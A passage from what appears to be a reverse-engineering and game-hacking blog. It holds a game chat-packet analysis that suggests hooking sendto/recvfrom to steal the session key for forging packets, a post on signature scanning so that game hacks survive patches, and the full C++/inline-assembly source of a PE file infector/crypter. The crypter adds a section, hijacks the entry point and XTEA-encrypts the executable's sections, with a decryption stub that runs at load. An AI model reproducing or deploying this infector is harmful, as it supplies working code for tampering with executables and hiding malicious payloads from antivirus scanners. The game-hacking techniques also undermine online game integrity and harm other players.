D8 26 D9 16 00 00 00 00 43 1A 18 00 06 00 00 00 EA 07 00 00 01 DC 59 59 4E 4E 4E 4E 4E 4E 32 00 04 00 00 00 01 41 41 41 41 00 18 00 80 DC
D8 26 D9 16 00 00 00 00 43 1B 23 02 06 00 00 00 EB 07 00 00 01 DC 59 59 4E 4E 4E 4E 4E 4E 32 00 05 00 00 00 01 41 41 41 41 41 00 00 80 DC 54
These packets show sending “A”, “AA”, “AAA”, “AAAA”, and “AAAAA” to the chat, which can be seen (0x41 characters). One thing to immediately note is that the name of the player sending the chat is not contained in the packet. That means that there is some field in the packet which denotes who is sending the packet. There also appear to be a few flags that serve as counters. The first packet contains 0x17 and 0xE7, the next one increments these bytes to 0x18 and 0xE8, the one afterwards to 0x19 and 0xE9, and so on. There is also a lone field in the packet which matches the size of the chat being sent. Lastly, there are some unknown values which seem to change with each packet sent. To get a better understanding of things, it is better to log packets over multiple instances/connections. The game was restarted and the same five packets were sent. Reproduced below are the five packets with their differences and chat highlighted. Additionally, the logging was done from sending chat as the second player in the game session.
DD BF 35 17 00 00 00 00 43 07 00 00 06 00 00 00 A7 0F 00 00 02 DC 59 59 4E 4E 4E 4E 4E 4E 4B 00 01 00 00 00 01 41 00 00 24 DC 18
DD BF 35 17 00 00 00 00 43 08 3D 02 06 00 00 00 A8 0F 00 00 02 DC 59 59 4E 4E 4E 4E 4E 4E 4B 00 02 00 00 00 01 41 41 00 24 DC 18 00
DD BF 35 17 00 00 00 00 43 09 18 00 06 00 00 00 A9 0F 00 00 02 DC 59 59 4E 4E 4E 4E 4E 4E 4B 00 03 00 00 00 01 41 41 41 00 DC 18 00 80
DD BF 35 17 00 00 00 00 43 0A 18 00 06 00 00 00 AA 0F 00 00 02 DC 59 59 4E 4E 4E 4E 4E 4E 4B 00 04 00 00 00 01 41 41 41 41 00 18 00 80 DC
DD BF 35 17 00 00 00 00 43 0B 3D 02 06 00 00 00 AB 0F 00 00 02 DC 59 59 4E 4E 4E 4E 4E 4E 4B 00 05 00 00 00 01 41 41 41 41 41 00 00 80 DC 54
Changes appeared to have happened within the expected offsets in the packets. Comparing differences between two packets from two different sessions:
D8 26 D9 16 00 00 00 00 43 1B 23 02 06 00 00 00 EB 07 00 00 01 DC 59 59 4E 4E 4E 4E 4E 4E 32 00 05 00 00 00 01 41 41 41 41 41 00 00 80 DC 54
DD BF 35 17 00 00 00 00 43 0B 3D 02 06 00 00 00 AB 0F 00 00 02 DC 59 59 4E 4E 4E 4E 4E 4E 4B 00 05 00 00 00 01 41 41 41 41 41 00 00 80 DC 54
The 0x1B and 0x0B flags are highlighted differently because they’re supposed to be the same. There were some intermediate messages sent between testing in one of the sessions and it threw off the counter. Everything else should be normal. One of the “unexpected” changes was that 0x01 changed to 0x02 and 0x32 changed to 0x4B. Since the only change aside from a new session was that the sending player was in the second player slot, it might be reasonable to guess that the byte that changed from 0x01 to 0x02 holds the number of the player who is sending the chat. The change in the other byte is unknown. The other unexpected change was that the first four bytes of the packet also changed. For the sake of not having to explain, I’ll simply mention that the first four, possibly eight, bytes appear to be a session key since they precede all packets sent throughout the game (not just chat ones). The actual value of the key is calculated external to the game, in the DirectPlay networking library. Finding out how the key is negotiated is still something that I am working on and won’t be covered in this series of posts — perhaps at a future date as my progress develops. The downside to not knowing how to calculate this is that in order to send custom packets to the client the connection must already exist. Obtaining the key is not really a problem however as sendto/recvfrom can be hooked and the key stored. The next thing to note is about the last four bytes of the packet. These are also external to game and appended by DirectPlay. From my testing, these four bytes appear to be a checksum on the size of the packet. For example, sending “a”, “b”, “q”, “$”, or any one character chat text will append 00 24 DC 18 to the packet. All two character texts have the same bytes appended at the end, and so on. The last thing is about the eight bytes after the player index. In the samples these bytes 0x59 and 0x4E. For a high level analysis, it is important to test as many things as possible. The in-game chat has three options: all (default), team, and enemy. Testing sending messages using these three options reveals that these eight bytes are the “audience” flags of who of the at most eight players in a game can see the chat message. Given that a majority of the packet has been understood and guessed at, this completes the high level preliminary analysis. A sample packet is shown below and guessed at or known fields are highlighted.
DD BF 35 17 00 00 00 00 43 0B 3D 02 06 00 00 00 AB 0F 00 00 02 DC 59 59 4E 4E 4E 4E 4E 4E 4B 00 05 00 00 00 01 41 41 41 41 41 00 00 80 DC 54

Red indicates a session key.
Blue indicates some sort of counter bytes.
Pink indicates the player sending the chat.
Green indicates who is to receive the message.
Yellow indicates the length of the chat string.
Grey indicates the chat string and the null terminator.
Teal indicates the trailing checksum.
Orange indicates unknown bytes that were constant across multiple sessions.
Black indicates unknown bytes that were variable across multiple sessions.

One last point to make is that at a high level, how some of these bytes are interpreted could be off. For example, the size of the packet shown as 0x05 could actually be given two bytes, 0x00 and 0x05 in the packet, making that orange unknown byte part of the size. The 0x06, 0x00, 0x00, 0x00 bytes could actually be a DWORD instead of four unique, unrelated properties, and so on. The high level analysis is good for getting started but the actual application will require reverse engineering to fully know what is going on. This will be the topic of the next post.

A downloadble PDF of this post can be found here.

May 26, 2011

Quick Post: Auto-updating with Signature Scanning

Filed under: Game Hacking,General x86,General x86-64 — admin @ 2:38 AM

One common problem with developing hacks or external modifications for games/applications is when the target application gets modified through patches, new versions, or so on. This might render offsets, structures, functions, or anything important that is used in the hack as useless if it is hardcoded. For example, assume that the hack puts a hook on a function at 0x1234ABCD. One day, a new version of the application is released and the new compiled version no longer has this function at 0x1234ABCD, but it’s at some different address, 0x12345678. Now the hack no longer works, and in the worst case, even crashes the application when used. This becomes annoying because some applications are frequently updated, which in turn requires frequent updates on the part of the hack developer. Even if the updates aren’t too frequent, it can be unnecessarily inconvenient to hunt down where the structures, functions, and so on ended up. One solution to this is called signature scanning. This technique is nothing new or special and has been used by both hack developers and anti-virus programs for many years (anti-viruses probably much longer than in hacks). It relies on finding parts of a program through scanning for certain byte patterns. For example, anti-virus programs rely partially on signature scanning when they scan files since each virus or variant can be identified with a sequence of bytes unique to it. Byte strings from scanned programs are taken and hashed. This hash is compared with known virus hashes in a database and if there is a match then there is a good chance that the application is a virus or has been infected. This of course ignores additional heuristics and scanning methods incorporated into anti-virus programs, but is still at a very basic level a key component of how they all work. This same methodology can be applied to developing game hacks or external modifications to applications in general since functions, structures, and so on also have unique byte patterns identifying them.

Shown above is part of a function that could serve as a signature. No other function in the application performs this unique set of instructions so assuming that this function does not change (the actual code within it is modified or things like new optimization settings or compilers being used) then it can always be identified with \x55\x8B\xEC\x51\x6A\x10\...\xD9\x59\x04 regardless of any updates of patches to the application. However, this technique is not without its downsides: scanning an entire file or image is costly in terms of speed. Thus, it is a pretty bad idea to develop a hack that scans an image for a signature each time it is loaded since that can slow things down a lot. What I personally do is keep an external config file that holds signatures and the offset (RVA) into the image at which they’re located. Then when a hack is loaded it can read in the config file and check that the signature exists where it’s supposed to. If it doesn’t then the hack will perform a scan on the whole image and write back into the config file where the new signature exists. This is only one way of doing it though so to each their own. Since the implementation is just searching for a substring, I feel that there’s really no need to put one here. Important things to note though for developing signature scanners:

  • Signature scanners should have some wildcard usage built in. Whether EAX, EBX and so on is used to hold a temporary value is irrelevant. For example, MOV EAX, 123 as a byte string is B823010000 and MOV EBX, 123 is BB23010000. The important part of those instructions is the 123 immediate value, so the B8 or BB byte is irrelevant. The signature can then be \x??\x23\x01\x00\x00. How \x?? is treated is implementation dependent.
  • Usually the most important parts of a signature are any references to other code, structures, local variables, etc. Getting a signature containing these will increase the chance of it being found. However, references to other code is a bit dangerous since relative distances can change between new versions of a target application.
  • A signature, by definition, should be unique. Using PUSH EBP ; MOV EBP, ESP is a bad idea.

A downloadable PDF of this post can be found here.

April 23, 2011

Writing a File Infector/Encrypter: Full Source Code and Remarks (4/4)

Filed under: Cryptography,General x86,Reverse Engineering — admin @ 5:54 PM

The full source code is reproduced below. The archive at the end of this post contains the source code and a compiled executable. 

Main.cpp

#include <Windows.h>
#include <wchar.h>
#include <stdio.h>
#include "Injector.h"
#include "Encrypter.h"
 
#define BB(x) __asm _emit x
 
#define STRING_COMPARE(str1, str2) \
    __asm push str1 \
    __asm call get_string_length \
    __asm push eax \
    __asm push str1 \
    __asm mov eax, str2 \
    __asm push eax \
    __asm call strings_equal
 
#pragma code_seg(".inject")
void __declspec(naked) injection_stub(void) {
    __asm { //Prologue, stub entry point
        pushad                  //Save context of entry point
        push ebp                //Set up stack frame
        mov ebp, esp
        sub esp, 0x200          //Space for local variables
 
    }
    PIMAGE_DOS_HEADER target_image_base;
    PIMAGE_DOS_HEADER kernel32_image_base;
    __asm {
        call get_module_list    //Get PEB
        mov ebx, eax
        push 0
        push ebx
        call get_dll_base       //Get image base of process
        mov [target_image_base], eax
        push 2
        push ebx
        call get_dll_base       //Get kernel32.dll image base
        mov [kernel32_image_base], eax
    }
    __asm { //Decrypt all sections
        push kernel32_image_base
        push target_image_base
        call decrypt_sections
    }
    //Any additional code can go here
    __asm { //Epilogue, stub exit point
        mov eax, target_image_base
        add eax, 0xCCDDEEFF     //Signature to be replaced by original entry point (OEP)
        mov esp, ebp
        mov [esp+0x20], eax     //Store OEP in EAX through ESP to preserve across popad
        pop ebp
        popad                   //Restore thread context, with OEP in EAX
        jmp eax                 //Jump to OEP
    }
 
    ///////////////////////////////////////////////////////////////////
    //Gets the module list
    //Preserves no registers, PEB_LDR_DATA->PPEB_LDR_DATA->InLoadOrderModuleList returned in EAX
    ///////////////////////////////////////////////////////////////////
    __asm {
    get_module_list:       
            mov eax, fs:[0x30]  //PEB
            mov eax, [eax+0xC]  //PEB_LDR_DATA->PPEB_LDR_DATA
            mov eax, [eax+0xC]  //PEB_LDR_DATA->PPEB_LDR_DATA->InLoadOrderModuleList
            retn
    }
    ///////////////////////////////////////////////////////////////////
 
    ///////////////////////////////////////////////////////////////////
    //Gets the DllBase member of the InLoadOrderModuleList structure
    //Call as void *get_dll_base(void *InLoadOrderModuleList, int index)
    ///////////////////////////////////////////////////////////////////
    __asm {
    get_dll_base:
        push ebp
        mov ebp, esp
        cmp [ebp+0xC], 0x0      //Initial zero check
        je done
        mov ecx, [ebp+0xC]      //Set loop index
        mov eax, [ebp+0x8]      //PEB->PPEB_LDR_DATA->InLoadOrderModuleList address
        traverse_list:
            mov eax, [eax]      //Go to next entry
        loop traverse_list
        done:
            mov eax, [eax+0x18] //PEB->PPEB_LDR_DATA->InLoadOrderModuleList.DllBase
            mov esp, ebp
            pop ebp
            ret 0x8
    }
    ///////////////////////////////////////////////////////////////////
 
    ///////////////////////////////////////////////////////////////////
    //Gets the length of the string passed as the parameter
    //Call as int get_string_length(char *str)
    ///////////////////////////////////////////////////////////////////
    __asm {
    get_string_length:
        push ebp
        mov ebp, esp
        mov edi, [ebp+0x8]      //String held here
        mov eax, 0x0            //EAX holds size of the string
        counting_loop:
            cmp byte ptr[edi], 0x0//Current byte is null-terminator?
            je string_done      //Done, leave loop
            inc edi             //Go to next character
            inc eax             //size++
            jmp counting_loop
        string_done:
            mov esp, ebp
            pop ebp
            retn
    }
    ///////////////////////////////////////////////////////////////////
 
    ///////////////////////////////////////////////////////////////////
    //String comparison function, checks for equality of two strings
    //Call as bool strings_equal(char *check_string, char *known_string, int known_string_length)
    ///////////////////////////////////////////////////////////////////
    __asm {
    strings_equal:
        push ebp
        mov ebp, esp
        mov eax, 0x0            //Assume unequal
        cld                     //Forward comparison
        mov esi, [ebp+0x8]      //ESI gets check_string
        mov edi, [ebp+0xC]      //EDI gets known_string
        mov ecx, [ebp+0x10]     //ECX gets known_string_length
        repe cmpsb              //Start comparing
        jne end
        mov eax, 0x1            //Strings equal
    end:
        mov esp, ebp
        pop ebp
        ret 0xC
    }
    ///////////////////////////////////////////////////////////////////
 
    ///////////////////////////////////////////////////////////////////
    //Implementation of GetProcAddress
    //Call as FARPROC GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
    ///////////////////////////////////////////////////////////////////
    get_proc_address:
        __asm {
            push ebp
            mov ebp, esp
            sub esp, 0x200
        }
        PIMAGE_DOS_HEADER kernel32_dos_header;
        PIMAGE_NT_HEADERS kernel32_nt_headers;
        PIMAGE_EXPORT_DIRECTORY kernel32_export_dir;
        unsigned short *ordinal_table;
        unsigned long *function_table;
        FARPROC function_address;
        int function_names_equal;
        __asm { //Initializations
            mov eax, [ebp+0x8]
            mov kernel32_dos_header, eax
            mov function_names_equal, 0x0
        }
        kernel32_nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)kernel32_dos_header + kernel32_dos_header->e_lfanew);
        kernel32_export_dir = (PIMAGE_EXPORT_DIRECTORY)((DWORD_PTR)kernel32_dos_header + 
            kernel32_nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
        for(unsigned long i = 0; i < kernel32_export_dir->NumberOfNames; ++i) {
            char *eat_entry = (*(char **)((DWORD_PTR)kernel32_dos_header + kernel32_export_dir->AddressOfNames + i * sizeof(DWORD_PTR)))
                + (DWORD_PTR)kernel32_dos_header;   //Current name in name table
            STRING_COMPARE([ebp+0xC], eat_entry) //Compare function in name table with the one we want to find
            __asm mov function_names_equal, eax
            if(function_names_equal == 1) {
                ordinal_table = (unsigned short *)(kernel32_export_dir->AddressOfNameOrdinals + (DWORD_PTR)kernel32_dos_header);
                function_table = (unsigned long *)(kernel32_export_dir->AddressOfFunctions + (DWORD_PTR)kernel32_dos_header);
                function_address = (FARPROC)((DWORD_PTR)kernel32_dos_header + function_table[ordinal_table[i]]);
                break;
            }
        }
        __asm {
            mov eax, function_address
            mov esp, ebp
            pop ebp
            ret 0x8
        }
    ///////////////////////////////////////////////////////////////////
 
    ///////////////////////////////////////////////////////////////////
    //Decrypts all sections in the image, excluding .rdata/.rsrc/.inject
    //Call as void decrypt_sections(void *image_base, void *kernel32_base)
    ///////////////////////////////////////////////////////////////////
    decrypt_sections:
        __asm {
            push ebp
            mov ebp, esp
            sub esp, 0x200
        }
        typedef BOOL (WINAPI *pVirtualProtect)(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect,
            PDWORD lpflOldProtect);
        char *str_virtualprotect;
        char *str_section_name;
        char *str_rdata_name;
        char *str_rsrc_name;
        PIMAGE_DOS_HEADER target_dos_header;
        int section_offset;
        int section_names_equal;
        unsigned long old_protections;
        pVirtualProtect virtualprotect_addr;
        __asm { //String initializations
            jmp virtualprotect
            virtualprotectback:
                pop esi
                mov str_virtualprotect, esi
            jmp section_name
            section_nameback:
                pop esi
                mov str_section_name, esi
            jmp rdata_name
            rdata_nameback:
                pop esi
                mov str_rdata_name, esi
            jmp rsrc_name
            rsrc_nameback:
                pop esi
                mov str_rsrc_name, esi
        }
        __asm { //Initializations
            mov eax, [ebp+0x8]
            mov target_dos_header, eax
            mov section_offset, 0x0
            mov section_names_equal, 0x0
            push str_virtualprotect
            push [ebp+0xC]
            call get_proc_address
            mov virtualprotect_addr, eax
        }
        PIMAGE_NT_HEADERS target_nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)target_dos_header + target_dos_header->e_lfanew);
        for(unsigned long j = 0; j < target_nt_headers->FileHeader.NumberOfSections; ++j) {
            section_offset = (target_dos_header->e_lfanew + sizeof(IMAGE_NT_HEADERS) +
                (sizeof(IMAGE_SECTION_HEADER) * j));
            PIMAGE_SECTION_HEADER section_header = (PIMAGE_SECTION_HEADER)((DWORD_PTR)target_dos_header + section_offset);
            STRING_COMPARE(str_section_name, section_header)
            __asm mov section_names_equal, eax
            STRING_COMPARE(str_rdata_name, section_header)
            __asm add section_names_equal, eax
            STRING_COMPARE(str_rsrc_name, section_header)
            __asm add section_names_equal, eax
            if(section_names_equal == 0) {
                unsigned char *current_byte = 
                    (unsigned char *)((DWORD_PTR)target_dos_header + section_header->VirtualAddress);
                unsigned char *last_byte = 
                    (unsigned char *)((DWORD_PTR)target_dos_header + section_header->VirtualAddress 
                    + section_header->SizeOfRawData);
                const unsigned int num_rounds = 32;
                const unsigned int key[4] = {0x12345678, 0xAABBCCDD, 0x10101010, 0xF00DBABE};
                for(current_byte; current_byte < last_byte; current_byte += 8) {
                    virtualprotect_addr(current_byte, sizeof(DWORD_PTR) * 2, PAGE_EXECUTE_READWRITE, &old_protections);
                    unsigned int block1 = (*current_byte << 24) | (*(current_byte+1) << 16) |
                        (*(current_byte+2) << 8) | *(current_byte+3);
                    unsigned int block2 = (*(current_byte+4) << 24) | (*(current_byte+5) << 16) |
                        (*(current_byte+6) << 8) | *(current_byte+7);
                    unsigned int full_block[] = {block1, block2};
                    unsigned int delta = 0x9E3779B9;
                    unsigned int sum = (delta * num_rounds);
                    for (unsigned int i = 0; i < num_rounds; ++i) {
                        full_block[1] -= (((full_block[0] << 4) ^ (full_block[0] >> 5)) + full_block[0]) ^ (sum + key[(sum >> 11) & 3]);
                        sum -= delta;
                        full_block[0] -= (((full_block[1] << 4) ^ (full_block[1] >> 5)) + full_block[1]) ^ (sum + key[sum & 3]);
                    }
                    virtualprotect_addr(current_byte, sizeof(DWORD_PTR) * 2, old_protections, NULL);
                    *(current_byte+3) = (full_block[0] & 0x000000FF);
                    *(current_byte+2) = (full_block[0] & 0x0000FF00) >> 8;
                    *(current_byte+1) = (full_block[0] & 0x00FF0000) >> 16;
                    *(current_byte+0) = (full_block[0] & 0xFF000000) >> 24;
                    *(current_byte+7) = (full_block[1] & 0x000000FF);
                    *(current_byte+6) = (full_block[1] & 0x0000FF00) >> 8;
                    *(current_byte+5) = (full_block[1] & 0x00FF0000) >> 16;
                    *(current_byte+4) = (full_block[1] & 0xFF000000) >> 24;
                }
            }
            section_names_equal = 0;
        }
        __asm {
            mov esp, ebp
            pop ebp
            ret 0x8
        }
 
    __asm {
    virtualprotect:
        call virtualprotectback
        BB('V') BB('i') BB('r') BB('t') BB('u') BB('a') BB('l')
        BB('P') BB('r') BB('o') BB('t') BB('e') BB('c') BB('t') BB(0)
    rdata_name:
        call rdata_nameback
        BB('.') BB('r') BB('d') BB('a') BB('t') BB('a') BB(0)
    rsrc_name:
        call rsrc_nameback
        BB('.') BB('r') BB('s') BB('r') BB('c') BB(0)
    section_name:
        call section_nameback
        BB('.') BB('i') BB('n') BB('j') BB('e') BB('c') BB('t') BB(0)
        int 0x3                 //Function signature
        int 0x3
        int 0x3
        int 0x3
    }
}
#pragma code_seg()
#pragma comment(linker, "/SECTION:.inject,re")
 
wchar_t *convert_to_unicode(char *str, unsigned int length) {
    wchar_t *wstr;
    int wstr_length = MultiByteToWideChar(CP_ACP, 0, str, (length + 1), NULL, 0);
    wstr = (wchar_t *)malloc(wstr_length * sizeof(wchar_t));
    wmemset(wstr, 0, wstr_length);
    if (wstr == NULL)
        return NULL;
    int written = MultiByteToWideChar(CP_ACP, 0, str, length, wstr, wstr_length);
    if(written > 0)
        return wstr;
    return NULL;
}
 
int main(int argc, char* argv[]) {
    if(argc != 2) {
        printf("Usage: ./%s <target>\n", argv[0]);
        return -1;
    }
    wchar_t *target_file_name = convert_to_unicode(argv[1], strlen(argv[1]));
    if(target_file_name == NULL) {
        printf("Could not convert %s to unicode\n", argv[1]);
        return -1;
    }
    pfile_info target_file = file_info_create();
    void (*stub_addr)(void) = injection_stub;
    unsigned int stub_size = get_stub_size(stub_addr);
    unsigned int stub_size_aligned = 0;
    bool map_file_success = map_file(target_file_name, stub_size, false, target_file);
    if(map_file_success == false) {
        wprintf(L"Could not map target file\n");
        return -1;
    }
    PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER)target_file->file_mem_buffer;
    PIMAGE_NT_HEADERS nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)dos_header + dos_header->e_lfanew);
    stub_size_aligned = align_to_boundary(stub_size, nt_headers->OptionalHeader.SectionAlignment);
    const char *section_name = ".inject";
    file_info_destroy(target_file);
    target_file = file_info_create();
    (void)map_file(target_file_name, stub_size_aligned, true, target_file);
    PIMAGE_SECTION_HEADER new_section = add_section(section_name, stub_size_aligned, target_file->file_mem_buffer);
    if(new_section == NULL) {
        wprintf(L"Could not add new section to file");
        return -1;
    }
    write_stub_entry_point(nt_headers, stub_addr);
    copy_stub_instructions(new_section, target_file->file_mem_buffer, stub_addr);
    change_file_oep(nt_headers, new_section);
    encrypt_file(nt_headers, target_file, section_name);
    int flush_view_success = FlushViewOfFile(target_file->file_mem_buffer, 0);
    if(flush_view_success == 0)
        wprintf(L"Could not save changes to file");
    file_info_destroy(target_file);
    return 0;
}

Injector.cpp

#include "Injector.h"
#include <stdio.h>
 
//Assumes malloc won't fail
pfile_info file_info_create(void) {
    pfile_info mapped_file_info = (pfile_info)malloc(sizeof(file_info));
    memset(mapped_file_info, 0, sizeof(file_info));
    return mapped_file_info;
}
 
//Assumes everything is valid, doesn't report error code
void file_info_destroy(pfile_info mapped_file_info) {
    if(mapped_file_info->file_mem_buffer != NULL)
        UnmapViewOfFile(mapped_file_info->file_mem_buffer);
    if(mapped_file_info->file_handle != NULL)
        CloseHandle(mapped_file_info->file_handle);
    if(mapped_file_info->file_map_handle != NULL)
        CloseHandle(mapped_file_info->file_map_handle);
    free(mapped_file_info);
    mapped_file_info = NULL;
}
 
inline unsigned int align_to_boundary(unsigned int address, unsigned int boundary) {
	return (((address + boundary - 1) / boundary) * boundary);
}
unsigned int get_stub_size(void* stub_addr) {
    unsigned int size = 0;
    if(stub_addr != NULL) {
        const char *stub_signature = "\xCC\xCC\xCC\xCC";
        while(memcmp(((unsigned char *)stub_addr + size), stub_signature, sizeof(int)) != 0)
            ++size;
    }
    return size;
}
 
bool map_file(const wchar_t *file_name, unsigned int stub_size, bool append_mode, pfile_info mapped_file_info) {
    void *file_handle = CreateFile(file_name, GENERIC_READ | GENERIC_WRITE, 0,
        NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if(file_handle == INVALID_HANDLE_VALUE) {
        wprintf(L"Could not open %s", file_name);
        return false;
    }
    unsigned int file_size = GetFileSize(file_handle, NULL);
    if(file_size == INVALID_FILE_SIZE) {
        wprintf(L"Could not get file size for %s", file_name);
        return false;
    }
    if(append_mode == true) {
        file_size += (stub_size + sizeof(DWORD_PTR));
    }
    void *file_map_handle = CreateFileMapping(file_handle, NULL, PAGE_READWRITE, 0,
        file_size, NULL);
    if(file_map_handle == NULL) {
        wprintf(L"File map could not be opened");
        CloseHandle(file_handle);
        return false;
    }
    void *file_mem_buffer = MapViewOfFile(file_map_handle, FILE_MAP_WRITE, 0, 0, file_size);
    if(file_mem_buffer == NULL) {
        wprintf(L"Could not map view of file");
        CloseHandle(file_map_handle);
        CloseHandle(file_handle);
        return false;
    }
    mapped_file_info->file_handle = file_handle;
    mapped_file_info->file_map_handle = file_map_handle;
    mapped_file_info->file_mem_buffer = (unsigned char*)file_mem_buffer;
    return true;
}
 
//Reference: http://www.codeproject.com/KB/system/inject2exe.aspx
PIMAGE_SECTION_HEADER add_section(const char *section_name, unsigned int section_size, void *image_addr) {
    PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER)image_addr;
    if(dos_header->e_magic != 0x5A4D) {
        wprintf(L"Could not retrieve DOS header from %p", image_addr);
        return NULL;
    }
    PIMAGE_NT_HEADERS nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)dos_header + dos_header->e_lfanew);
    if(nt_headers->OptionalHeader.Magic != 0x010B) {
        wprintf(L"Could not retrieve NT header from %p", dos_header);
        return NULL;
    }
    const int name_max_length = 8;
    PIMAGE_SECTION_HEADER last_section = IMAGE_FIRST_SECTION(nt_headers) + (nt_headers->FileHeader.NumberOfSections - 1);
    PIMAGE_SECTION_HEADER new_section = IMAGE_FIRST_SECTION(nt_headers) + (nt_headers->FileHeader.NumberOfSections);
    memset(new_section, 0, sizeof(IMAGE_SECTION_HEADER));
    new_section->Characteristics = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE;
    memcpy(new_section->Name, section_name, name_max_length);
    new_section->Misc.VirtualSize = section_size;
    new_section->PointerToRawData = align_to_boundary(last_section->PointerToRawData + last_section->SizeOfRawData,
        nt_headers->OptionalHeader.FileAlignment);
    new_section->SizeOfRawData = align_to_boundary(section_size, nt_headers->OptionalHeader.SectionAlignment);
    new_section->VirtualAddress = align_to_boundary(last_section->VirtualAddress + last_section->Misc.VirtualSize,
        nt_headers->OptionalHeader.SectionAlignment);
    nt_headers->OptionalHeader.SizeOfImage =  new_section->VirtualAddress + new_section->Misc.VirtualSize;
    nt_headers->FileHeader.NumberOfSections++;
    return new_section;
}
 
void copy_stub_instructions(PIMAGE_SECTION_HEADER section, void *image_addr, void *stub_addr) {
    unsigned int stub_size = get_stub_size(stub_addr);
    memcpy(((unsigned char *)image_addr + section->PointerToRawData), stub_addr, stub_size);
}
 
void change_file_oep(PIMAGE_NT_HEADERS nt_headers, PIMAGE_SECTION_HEADER section) {
    unsigned int file_address = section->PointerToRawData;
    PIMAGE_SECTION_HEADER current_section = IMAGE_FIRST_SECTION(nt_headers);
    for(int i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) {
        if(file_address >= current_section->PointerToRawData &&
            file_address < (current_section->PointerToRawData + current_section->SizeOfRawData)){
                file_address -= current_section->PointerToRawData;
                file_address += (nt_headers->OptionalHeader.ImageBase + current_section->VirtualAddress);
                break;
        }
    ++current_section;
    }
    nt_headers->OptionalHeader.AddressOfEntryPoint =  file_address - nt_headers->OptionalHeader.ImageBase;
}
 
void write_stub_entry_point(PIMAGE_NT_HEADERS nt_headers, void *stub_addr) {
    if(stub_addr != NULL) {
        const char *signature = "\xFF\xEE\xDD\xCC";
        unsigned int index = 0;
        while(memcmp(((unsigned char *)stub_addr + index), signature, sizeof(int)) != 0) {
            ++index;
        }
        DWORD old_protections = 0;
        VirtualProtect(((unsigned char *)stub_addr + index), sizeof(DWORD), PAGE_EXECUTE_READWRITE, &old_protections);
        memcpy(((unsigned char *)stub_addr + index), &nt_headers->OptionalHeader.AddressOfEntryPoint, sizeof(DWORD));
        VirtualProtect(((unsigned char *)stub_addr + index), sizeof(DWORD), old_protections, NULL);
    }
}

Injector.h

#pragma once
#include <Windows.h>
 
typedef struct {
    void *file_handle;
    void *file_map_handle;
    unsigned char *file_mem_buffer;
} file_info, *pfile_info;
 
pfile_info file_info_create(void);
void file_info_destroy(pfile_info mapped_file_info);
unsigned int align_to_boundary(unsigned int address, unsigned int boundary);
unsigned int get_stub_size(void* stub_addr);
bool map_file(const wchar_t *file_name, unsigned int stub_size, bool append_mode, pfile_info mapped_file_info);
PIMAGE_SECTION_HEADER add_section(const char *section_name, unsigned int section_size, void *image_addr);
void copy_stub_instructions(PIMAGE_SECTION_HEADER section, void *image_addr, void *stub_addr);
void change_file_oep(PIMAGE_NT_HEADERS nt_headers, PIMAGE_SECTION_HEADER section);
void write_stub_entry_point(PIMAGE_NT_HEADERS nt_headers, void *stub_addr);

Encrypter.cpp

#include "Encrypter.h"
#include <stdio.h>
 
void encrypt_file(PIMAGE_NT_HEADERS nt_headers, pfile_info target_file, const char *excluded_section_name) {
    PIMAGE_SECTION_HEADER current_section = IMAGE_FIRST_SECTION(nt_headers);
    const char *excluded_sections[] = {".rdata", ".rsrc", excluded_section_name};
    for(int i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) {
        int excluded = 1;
        for(int j = 0; j < sizeof(excluded_sections)/sizeof(excluded_sections[0]); ++j)
            excluded &= strcmp(excluded_sections[j], (char *)current_section->Name);
        if(excluded != 0) {
            unsigned char *section_start = 
                (unsigned char *)target_file->file_mem_buffer + current_section->PointerToRawData;
            unsigned char *section_end = section_start + current_section->SizeOfRawData;
            const unsigned int num_rounds = 32;
            const unsigned int key[] = {0x12345678, 0xAABBCCDD, 0x10101010, 0xF00DBABE};
            for(unsigned char *k = section_start; k < section_end; k += 8) {
                unsigned int block1 = (*k << 24) | (*(k+1) << 16) | (*(k+2) << 8) | *(k+3);
                unsigned int block2 = (*(k+4) << 24) | (*(k+5) << 16) | (*(k+6) << 8) | *(k+7);
                unsigned int full_block[] = {block1, block2};
                encrypt(num_rounds, full_block, key);
                full_block[0] = swap_endianess(full_block[0]);
                full_block[1] = swap_endianess(full_block[1]);
                memcpy(k, full_block, sizeof(full_block));
            }
        }
        current_section++;
    }
}
 
//Encryption/decryption routines modified from http://en.wikipedia.org/wiki/XTEA
void encrypt(unsigned int num_rounds, unsigned int blocks[2], unsigned int const key[4]) {
    const unsigned int delta = 0x9E3779B9;
    unsigned int sum = 0;
    for (unsigned int i = 0; i < num_rounds; ++i) {
        blocks[0] += (((blocks[1] << 4) ^ (blocks[1] >> 5)) + blocks[1]) ^ (sum + key[sum & 3]);
        sum += delta;
        blocks[1] += (((blocks[0] << 4) ^ (blocks[0] >> 5)) + blocks[0]) ^ (sum + key[(sum >> 11) & 3]);
    }
}
 
//Unused, kept for testing/verification
void decrypt(unsigned int num_rounds, unsigned int blocks[2], unsigned int const key[4]) {
    const unsigned int delta = 0x9E3779B9;
    unsigned int sum = delta * num_rounds;
    for (unsigned int i = 0; i < num_rounds; ++i) {
        blocks[1] -= (((blocks[0] << 4) ^ (blocks[0] >> 5)) + blocks[0]) ^ (sum + key[(sum >> 11) & 3]);
        sum -= delta;
        blocks[0] -= (((blocks[1] << 4) ^ (blocks[1] >> 5)) + blocks[1]) ^ (sum + key[sum & 3]);
    }
}
 
inline unsigned int swap_endianess(unsigned int value) {
    return (value >> 24) |  ((value << 8) & 0x00FF0000) |
        ((value >> 8) & 0x0000FF00) | (value << 24);
}

Encrypter.h

#pragma once
#include "Injector.h"
 
void encrypt_file(PIMAGE_NT_HEADERS nt_headers, pfile_info target_file, const char *excluded_section_name);
void encrypt(unsigned int num_rounds, unsigned int blocks[2], unsigned int const key[4]);
void decrypt(unsigned int num_rounds, unsigned int blocks[2], unsigned int const key[4]);
